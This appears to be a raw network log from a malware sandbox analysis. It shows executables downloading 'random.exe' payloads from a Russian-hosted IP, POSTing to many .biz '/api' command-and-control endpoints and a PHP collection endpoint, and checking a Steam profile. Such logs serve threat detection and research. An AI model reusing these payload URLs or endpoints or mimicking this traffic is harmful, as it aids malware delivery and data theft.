                                  Content-Type: multipart/form-data; boundary=----EGDGIEGHJEGIDGCAFBFC
                                  Host: 185.215.113.206
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:16:59 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                • flag-us
                                  DNS
                                  206.113.215.185.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  206.113.215.185.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-ru
                                  GET
                                  http://185.215.113.16/luma/random.exe
                                  skotes.exe
                                  Remote address:
                                  185.215.113.16:80
                                  Request
                                  GET /luma/random.exe HTTP/1.1
                                  Host: 185.215.113.16
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:02 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 1819648
                                  Last-Modified: Fri, 06 Dec 2024 01:42:37 GMT
                                  Connection: keep-alive
                                  ETag: "6752568d-1bc400"
                                  Accept-Ranges: bytes
                                • flag-ru
                                  GET
                                  http://185.215.113.16/steam/random.exe
                                  skotes.exe
                                  Remote address:
                                  185.215.113.16:80
                                  Request
                                  GET /steam/random.exe HTTP/1.1
                                  Host: 185.215.113.16
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:07 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 5222400
                                  Last-Modified: Fri, 06 Dec 2024 01:42:46 GMT
                                  Connection: keep-alive
                                  ETag: "67525696-4fb000"
                                  Accept-Ranges: bytes
                                • flag-ru
                                  GET
                                  http://185.215.113.16/well/random.exe
                                  skotes.exe
                                  Remote address:
                                  185.215.113.16:80
                                  Request
                                  GET /well/random.exe HTTP/1.1
                                  Host: 185.215.113.16
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:36 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 967680
                                  Last-Modified: Fri, 06 Dec 2024 01:40:49 GMT
                                  Connection: keep-alive
                                  ETag: "67525621-ec400"
                                  Accept-Ranges: bytes
                                • flag-ru
                                  GET
                                  http://185.215.113.16/off/random.exe
                                  skotes.exe
                                  Remote address:
                                  185.215.113.16:80
                                  Request
                                  GET /off/random.exe HTTP/1.1
                                  Host: 185.215.113.16
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx/1.18.0 (Ubuntu)
                                  Date: Fri, 06 Dec 2024 02:17:39 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 2741760
                                  Last-Modified: Fri, 06 Dec 2024 01:41:15 GMT
                                  Connection: keep-alive
                                  ETag: "6752563b-29d600"
                                  Accept-Ranges: bytes
                                • flag-us
                                  DNS
                                  16.113.215.185.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  16.113.215.185.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  POST
                                  https://atten-supporse.biz/api
                                  f56e441c8f.exe
                                  Remote address:
                                  172.67.165.166:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: atten-supporse.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:06 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=rfof7d1j0pohqh5g9p9b2lslav; expires=Mon, 31-Mar-2025 20:03:45 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Yyb47Po6NokRmMJcGuKC0olBFhPtsQlSF7kZdis5wzgdKRp5t8Ifk3wRazxh2CFyTjySXorssIgP1wtpyUW4j75t7Cip4zY1hdVEmbrUYlu8vrnuMCdqnUnTQZLQqaNmpI0BN0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c7148bd0beb9-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=48469&min_rtt=47137&rtt_var=12330&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3306&recv_bytes=609&delivery_rate=80346&cwnd=253&unsent_bytes=0&cid=0596e63bb273297f&ts=575&x=0"
                                • flag-us
                                  POST
                                  https://se-blurry.biz/api
                                  f56e441c8f.exe
                                  Remote address:
                                  104.21.81.153:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: se-blurry.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:06 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=qqg05agjcvno3ltkf6q31sdri6; expires=Mon, 31-Mar-2025 20:03:45 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3JpQpXB8Vv1teJu6CBemPrtUYIjskTH0clKlOeqw0gX4TEZGE22%2FZ%2Bzd2YF9ARjHTeHIC%2BO0O23clXOfNvGCRDW0qb%2FRBqbKLYr9DfnBtm8LCIX2%2FMLrRXd%2FncqGDWzb"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c719181363f5-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=63516&min_rtt=59519&rtt_var=19589&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3289&recv_bytes=599&delivery_rate=62260&cwnd=253&unsent_bytes=0&cid=2414351aa7b7f140&ts=363&x=0"
                                • flag-us
                                  POST
                                  https://zinc-sneark.biz/api
                                  f56e441c8f.exe
                                  Remote address:
                                  172.67.136.167:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: zinc-sneark.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:07 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=s57crqho0e2ask1pjjm5p08usk; expires=Mon, 31-Mar-2025 20:03:46 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=17fULF%2FkzA2kCvXva05OTxOiT57yJf081Ul4Eu3vXeF%2BGCRLag68sEEwcIqw3%2FzqcBdrhkdA72mTgJei0ddlUKaPGQmCfWrad5NcFx1Gwp%2FgQd%2F4mahnIIOBUe%2FeoJm7lds%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c71e08ce3d88-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=52747&min_rtt=50579&rtt_var=15440&sent=7&recv=7&lost=0&retrans=1&sent_bytes=3554&recv_bytes=603&delivery_rate=76809&cwnd=254&unsent_bytes=0&cid=bcf839cddfe87b72&ts=707&x=0"
                                • flag-us
                                  POST
                                  https://dwell-exclaim.biz/api
                                  f56e441c8f.exe
                                  Remote address:
                                  172.67.153.96:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: dwell-exclaim.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:10 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=25s2tpfgqg7f50jidfkvtt7l4m; expires=Mon, 31-Mar-2025 20:03:48 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E9juQgyFVaniyVBfekbkp8m5z6ciAHCq%2B6OPw8LTsOJksYVEepoaOm9wePcUb6LPEd1qJsK0pJSuSQ561qmyKugm9lejrSCOCy%2BmbYsg7EwMuK3%2B0O2f28nPqf4ysLVXpd2nsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c7297f1c7783-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=51283&min_rtt=50870&rtt_var=19902&sent=7&recv=6&lost=0&retrans=1&sent_bytes=3562&recv_bytes=607&delivery_rate=75143&cwnd=254&unsent_bytes=0&cid=3d68d811876ba2ce&ts=1694&x=0"
                                • flag-us
                                  DNS
                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY
                                  Dr.com
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY
                                  IN A
                                  Response
                                • flag-us
                                  DNS
                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY
                                  Dr.com
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY
                                  IN A
                                • flag-us
                                  DNS
                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY
                                  Dr.com
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  UWPunrsopYzTstryocRtyY.UWPunrsopYzTstryocRtyY
                                  IN A
                                • flag-us
                                  POST
                                  https://formy-spill.biz/api
                                  f56e441c8f.exe
                                  Remote address:
                                  172.67.173.74:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: formy-spill.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:14 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=gd9akri4d04hn4lc9pt9oi5efm; expires=Mon, 31-Mar-2025 20:03:51 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5JTHaHAgDX7O1DGr%2Bdt7vUdFjAKnfK4VntsUpiCIn8P0GIQgzZ6DzZsNKp0XCvbXlvHzKN5mo7zzpa7poHg%2F%2Fk4jnpkO9ImrS25ik%2FA4hp5WaWNcQpas9y3wj6mC7acoGH4%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c73cfc2276c3-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=447773&min_rtt=60542&rtt_var=336004&sent=6&recv=6&lost=0&retrans=0&sent_bytes=3294&recv_bytes=603&delivery_rate=65043&cwnd=253&unsent_bytes=0&cid=e48a7cafc9119f60&ts=1711&x=0"
                                • flag-us
                                  DNS
                                  197.87.175.4.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  197.87.175.4.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  DNS
                                  18.31.95.13.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  18.31.95.13.in-addr.arpa
                                  IN PTR
                                  Response
                                • flag-us
                                  POST
                                  https://covery-mover.biz/api
                                  f56e441c8f.exe
                                  Remote address:
                                  172.67.206.64:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: covery-mover.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:15 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=i7ts9rlcsl5cvc46h4h6o4q7ql; expires=Mon, 31-Mar-2025 20:03:54 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0zxOtiv5t4%2FwC3%2FbjWhzYdjCdUJcPimGex7TkZtzxR6at2ShlTtWRcAXRj0c74E3%2FQqq6CvlxYU1jEDfUmH6QqAK0uFFEyvLSW4SSaZEMk7uxvs1AVrsr9kzryq6qBjaNkYG"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c7489b1794f6-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=68159&min_rtt=64542&rtt_var=19210&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3300&recv_bytes=605&delivery_rate=54274&cwnd=253&unsent_bytes=0&cid=375a3a97184af602&ts=1800&x=0"
                                • flag-us
                                  POST
                                  https://dare-curbys.biz/api
                                  f56e441c8f.exe
                                  Remote address:
                                  104.21.43.156:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: dare-curbys.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:19 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=ar7e40jal4ap4hfe6vjk0r25gt; expires=Mon, 31-Mar-2025 20:03:58 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FklT6kX6IpbuqkYfGf%2FnNor5JTbrz2leA7HEV6LB2GY2KVv5Qt71kbv4YqS%2Ff6%2BjtdMAda5Y2ibxCxBsPFr0Y1npjd6IbpEcBDnAcdi0TqhT22mhA5j%2BUpb51gOa9eI5%2Bkc%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c7670ee76361-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=51045&min_rtt=50510&rtt_var=11453&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3296&recv_bytes=603&delivery_rate=74998&cwnd=253&unsent_bytes=0&cid=b6c8bcae83ff5ec5&ts=854&x=0"
                                • flag-us
                                  DNS
                                  92.12.20.2.in-addr.arpa
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  92.12.20.2.in-addr.arpa
                                  IN PTR
                                  Response
                                  92.12.20.2.in-addr.arpa
                                  IN PTR
                                  a2-20-12-92deploystaticakamaitechnologiescom
                                • flag-us
                                  POST
                                  https://print-vexer.biz/api
                                  f56e441c8f.exe
                                  Remote address:
                                  104.21.35.246:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: print-vexer.biz
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:21 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=j355d7q304vtrh9veaf59ee7fr; expires=Mon, 31-Mar-2025 20:03:59 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jtt3Cr0acSlYgfThSTFl63ngtkPeELzrmoa%2BkUR6aKxuN9MY1bWHAXD0v8dAX6A8n%2BwXFKf%2Fu3ZrACpPZmiIWwXArZkJmWjtnF9IgZpAyw0fg4uvZlApk%2B%2FuDQSsqkfi6r8%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c76d093b955f-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=52171&min_rtt=47196&rtt_var=12766&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3294&recv_bytes=603&delivery_rate=78446&cwnd=253&unsent_bytes=0&cid=50ab8f25e199cd1c&ts=1582&x=0"
                                • flag-us
                                  DNS
                                  impend-differ.biz
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  impend-differ.biz
                                  IN A
                                  Response
                                • flag-us
                                  DNS
                                  steamcommunity.com
                                  f56e441c8f.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  steamcommunity.com
                                  IN A
                                  Response
                                  steamcommunity.com
                                  IN A
                                  23.214.143.155
                                • flag-gb
                                  GET
                                  https://steamcommunity.com/profiles/76561199724331900
                                  f56e441c8f.exe
                                  Remote address:
                                  23.214.143.155:443
                                  Request
                                  GET /profiles/76561199724331900 HTTP/1.1
                                  Connection: Keep-Alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Host: steamcommunity.com
                                  Response
                                  HTTP/1.1 200 OK
                                  Server: nginx
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                  Cache-Control: no-cache
                                  Date: Fri, 06 Dec 2024 02:17:22 GMT
                                  Content-Length: 35602
                                  Connection: keep-alive
                                  Set-Cookie: sessionid=1632c0fd992062af2d745b50; Path=/; Secure; SameSite=None
                                  Set-Cookie: steamCountry=GB%7C7d625a3b038bb98f68b4e14dac147806; Path=/; Secure; HttpOnly; SameSite=None
                                • flag-us
                                  POST
                                  https://marshal-zhukov.com/api
                                  f56e441c8f.exe
                                  Remote address:
                                  172.67.160.80:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 8
                                  Host: marshal-zhukov.com
                                  Response
                                  HTTP/1.1 403 Forbidden
                                  Date: Fri, 06 Dec 2024 02:17:22 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  X-Frame-Options: SAMEORIGIN
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jp58DKphGwTlndHSB7cRZcv%2FSkExNX%2F0Ubfj%2BS%2FRp5bzYFLs1jfle9ZSbvtGHuo0RNGTzxyhb7Y2MT%2BVG1UA9qypqrlIu5wIioyZJBQ9991in6bUOhKfEcwj1sGStN13yO0nWTA%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c77e897f9496-LHR
                                • flag-us
                                  POST
                                  https://marshal-zhukov.com/api
                                  f56e441c8f.exe
                                  Remote address:
                                  172.67.160.80:443
                                  Request
                                  POST /api HTTP/1.1
                                  Connection: Keep-Alive
                                  Content-Type: application/x-www-form-urlencoded
                                  Cookie: __cf_mw_byp=NCOHsuG9ZNw7kyq4oaqwrQOexARIbuBIgpIY7VJNt7c-1733451442-0.0.1.1-/api
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                  Content-Length: 53
                                  Host: marshal-zhukov.com
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:24 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Transfer-Encoding: chunked
                                  Connection: keep-alive
                                  Set-Cookie: PHPSESSID=onu03svvi6its1gf3jlisbojho; expires=Mon, 31-Mar-2025 20:04:02 GMT; Max-Age=9999999; path=/
                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                  Cache-Control: no-store, no-cache, must-revalidate
                                  Pragma: no-cache
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=st%2BJXnU4a7MnXZViJkklObRMJQAt6SXxSalZi1PIaxs07S45guE4xd43I4kdySOevuBM%2FUeq7vpBjG1XV4BOZurcwxNXW1kMNUrTuZKCeOsLkPdeNBZmHcQlWdrX5MIKsiYIa1Y%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 8ed8c77f19fa9496-LHR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=47515&min_rtt=46913&rtt_var=4900&sent=13&recv=12&lost=0&retrans=0&sent_bytes=8580&recv_bytes=1075&delivery_rate=172069&cwnd=257&unsent_bytes=0&cid=1bcfd0c19b0ba261&ts=1911&x=0"
                                • flag-ru
                                  GET
                                  http://185.215.113.206/
                                  1dd8bdd825.exe
                                  Remote address:
                                  185.215.113.206:80
                                  Request
                                  GET / HTTP/1.1
                                  Host: 185.215.113.206
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:35 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 0
                                  Keep-Alive: timeout=5, max=100
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                • flag-ru
                                  POST
                                  http://185.215.113.206/c4becf79229cb002.php
                                  1dd8bdd825.exe
                                  Remote address:
                                  185.215.113.206:80
                                  Request
                                  POST /c4becf79229cb002.php HTTP/1.1
                                  Content-Type: multipart/form-data; boundary=----HDBGHIDGDGHCBGDGCBFI
                                  Host: 185.215.113.206
                                  Content-Length: 211
                                  Connection: Keep-Alive
                                  Cache-Control: no-cache
                                  Response
                                  HTTP/1.1 200 OK
                                  Date: Fri, 06 Dec 2024 02:17:35 GMT
                                  Server: Apache/2.4.41 (Ubuntu)
                                  Content-Length: 8
                                  Keep-Alive: timeout=5, max=99
                                  Connection: Keep-Alive
                                  Content-Type: text/html; charset=UTF-8
                                • flag-us
                                  DNS
                                  youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube.com
                                  IN A
                                  Response
                                  youtube.com
                                  IN A
                                  216.58.213.14
                                • flag-us
                                  DNS
                                  spocs.getpocket.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  spocs.getpocket.com
                                  IN A
                                  Response
                                  spocs.getpocket.com
                                  IN CNAME
                                  prod.ads.prod.webservices.mozgcp.net
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.188.166
                                • flag-us
                                  DNS
                                  spocs.getpocket.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  spocs.getpocket.com
                                  IN A
                                  Response
                                  spocs.getpocket.com
                                  IN CNAME
                                  prod.ads.prod.webservices.mozgcp.net
                                  prod.ads.prod.webservices.mozgcp.net
                                  IN A
                                  34.117.188.166
                                • flag-us
                                  DNS
                                  firefox-api-proxy.cdn.mozilla.net
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  firefox-api-proxy.cdn.mozilla.net
                                  IN A
                                  Response
                                  firefox-api-proxy.cdn.mozilla.net
                                  IN CNAME
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net
                                  IN A
                                  34.149.97.1
                                • flag-gb
                                  GET
                                  https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                                  firefox.exe
                                  Remote address:
                                  216.58.213.14:443
                                  Request
                                  GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
                                  host: youtube.com
                                  user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                                  accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                  accept-language: en-US,en;q=0.5
                                  accept-encoding: gzip, deflate, br
                                  upgrade-insecure-requests: 1
                                  sec-fetch-dest: document
                                  sec-fetch-mode: navigate
                                  sec-fetch-site: none
                                  sec-fetch-user: ?1
                                  te: trailers
                                • flag-us
                                  DNS
                                  youtube.com
                                  firefox.exe
                                  Remote address:
                                  8.8.8.8:53
                                  Request
                                  youtube.com
                                  IN A
                                  Response
